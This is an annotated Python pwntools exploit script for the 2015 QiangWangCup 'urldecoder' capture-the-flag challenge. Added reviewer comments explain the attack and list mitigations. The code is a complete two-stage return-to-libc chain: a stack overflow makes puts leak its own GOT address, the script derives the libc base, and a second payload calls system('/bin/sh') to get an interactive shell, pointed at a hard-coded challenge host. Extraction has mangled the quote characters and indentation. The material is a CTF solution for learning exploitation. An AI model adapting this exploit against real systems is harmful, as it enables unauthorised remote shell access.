#Exploit for urldecoder@qiangwangcup
#@Windcarp 2015.07.05
from pwn import *
# Exploit for urldecoder@qiangwangcup (author: @Windcarp, 2015.07.05).
#
# NOTE(review): this is a Python 2 / early-pwntools script (print statements,
# raw_input(), the .next() iterator call).  The curly quote characters around
# string literals and the missing indentation inside the if/else below look
# like page-extraction artifacts rather than part of the original script.
#
# What the code itself shows: a stack overflow in the target's URL decoder is
# used for a two-stage return-to-libc chain -- stage 1 returns into puts@plt to
# print the GOT entry of puts (leaking the loaded libc address), stage 2 uses
# the derived libc base to return into system() with a "/bin/sh" argument.
#
# Defender's view (hedged -- the target's protections are not visible here):
# the hard-coded 0x0804xxxx return address and the fixed PLT/GOT addresses
# suggest a non-PIE 32-bit binary, and the GOT leak is what defeats libc ASLR.
# Stack canaries, PIE and full RELRO would each break a step of this chain;
# the root cause to fix is the unchecked length in the decoder itself.
#init
# pwntools target description: 32-bit x86 Linux (affects ELF/packing helpers).
context(arch = ‘i386‘, os = ‘linux‘)
# local=True runs the binary as a child process and uses the host's libc;
# otherwise it connects to the challenge host and uses the libc shipped with
# the challenge (symbol offsets must match the libc the target actually loads).
local=True
if local:
p = process("./urldecoder")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
else:
p = remote("166.111.132.132", 10002)
libc = ELF("./libc.so.6.i386")
binary = ELF("urldecoder")
#address
# Little-endian bytes of 0x08048590: used as the return address after the
# stage-1 puts call.  The script then waits for another "URL:" prompt, so this
# presumably re-enters the program's read loop -- TODO confirm in the binary.
ret_addr_str = ‘\x90\x85\x04\x08‘
# Distance from the overflowed buffer to the saved return address.  Why 8 is
# subtracted from it when building the padding is not visible here (likely
# the decoded prefix below accounts for part of the distance) -- TODO confirm.
len_to_ret = 0x9c
# Resolved from the non-PIE binary and the chosen libc image.
puts_plt = binary.plt[‘puts‘]
puts_got = binary.got[‘puts‘]
puts_libc = libc.symbols["puts"]
system_libc = libc.symbols["system"]
# First occurrence of the "/bin/sh" string inside libc (Python 2 iterator API).
binsh_libc = libc.search(‘/bin/sh‘).next()
#payload
# Stage 1.  The prefix contains a percent-escape followed by a NUL byte; this
# appears to be what makes the decoder mis-handle the input length (TODO
# confirm -- the decoder's logic is not on this page).  Frame layout after the
# padding: [puts@plt][return address][argument = puts GOT entry].
payload = ‘http://%\x001‘
payload += ‘a‘*(len_to_ret - 8)
payload += p32(puts_plt) + ret_addr_str + p32(puts_got)
#pause for gdb to attach
# Blocks until Enter is pressed so a debugger can be attached to the child.
raw_input()
#first step
#attention to fit the program well
p.recvuntil("URL:")
p.send(payload + ‘\n‘)
#second step
# The program echoes the decoded input; read up to the next prompt so the
# leaked bytes written by puts are included.
p.recvuntil("Decode Result:")
#data = p.recv(timeout=0.01)
data = p.recvuntil("URL:")
#let‘s check
# Python 2 print statements.  The 4-byte slice offset (9:13) is page-specific
# and was evidently determined from the observed output format.
print "[*] data : ",repr(data)
print "[*] puts_got_addr : ",repr(data[9:13])
#third step
# Leaked runtime address of puts minus its static offset gives the libc base;
# system() and "/bin/sh" are rebased from there.
puts_got_addr = data[9:13]
puts_addr = u32(puts_got_addr)
libc_addr = puts_addr - puts_libc
system_addr = libc_addr + system_libc
binsh_addr = libc_addr + binsh_libc
#final step
# Stage 2: same overflow and frame layout, now [system][return][&"/bin/sh"].
payload2 = ‘http://%\x001‘
payload2 += ‘a‘*(len_to_ret - 8)
payload2 += p32(system_addr) + ret_addr_str + p32(binsh_addr)
p.send(payload2 + ‘\n‘)
#yeah!We got the shell!
# Hand the connection over to the terminal.
p.interactive()
【PWN】Urldecoder@QiangWangCup